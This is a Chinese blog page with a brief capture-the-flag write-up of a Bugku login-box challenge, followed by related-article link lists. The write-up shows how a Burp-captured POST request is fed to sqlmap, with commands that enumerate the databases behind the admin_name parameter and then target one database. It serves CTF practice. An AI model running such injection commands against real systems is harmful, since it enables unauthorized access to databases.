bugku-这是一个神奇的登陆框
打开http://123.206.87.240:9001/sql/后是个登陆界面 查看源代码 于是考虑到sql注入,因为是post,所以将burp的抓到的包保存到1.txt中,用sqlmap抓包 命令:sqlmap.py -r 1.txt -p admin_name --dbs//爆数据库名 后续在保表、列以及数据 命令sqlmap.py -r 1.txt -p admin_name -D bug
相关文章
- 1. bugku---这是一个神奇的登陆框 (burp配合sqlmap实例)
- 2. BugkuCTF 这是一个神奇的登陆框
- 3. BugkuCTF之web题之这是一个神奇的登录框
- 4. *这是一条神奇的天路*
- 5. 一个登陆框实现不一样的登陆验证
- 6. 8月份 是一个神奇的月份,作一个神奇的网站
- 7. 码农是一个神奇的行业
- 8. 我是这样搞懂一个神奇的BUG
- 9. 一个登陆框引起的血案
- 10. 一个神奇的BUG
- 更多相关文章...
- • 第一个MyBatis程序 - MyBatis教程
- • 第一个Hibernate程序 - Hibernate教程
- • Docker容器实战(一) - 封神Server端技术
- • 再有人问你分布式事务,把这篇扔给他
相关标签/搜索
每日一句
-
每一个你不满意的现在,都有一个你没有努力的曾经。
最新文章
- 1. 在windows下的虚拟机中,安装华为电脑的deepin操作系统
- 2. 强烈推荐款下载不限速解析神器
- 3. 【区块链技术】孙宇晨:区块链技术带来金融服务的信任变革
- 4. 搜索引起的链接分析-计算网页的重要性
- 5. TiDB x 微众银行 | 耗时降低 58%,分布式架构助力实现普惠金融
- 6. 《数字孪生体技术白皮书》重磅发布(附完整版下载)
- 7. 双十一“避坑”指南:区块链电子合同为电商交易保驾护航!
- 8. 区块链产业,怎样“链”住未来?
- 9. OpenglRipper使用教程
- 10. springcloud请求一次好用一次不好用zuul Name or service not known
欢迎关注本站公众号,获取更多信息
相关文章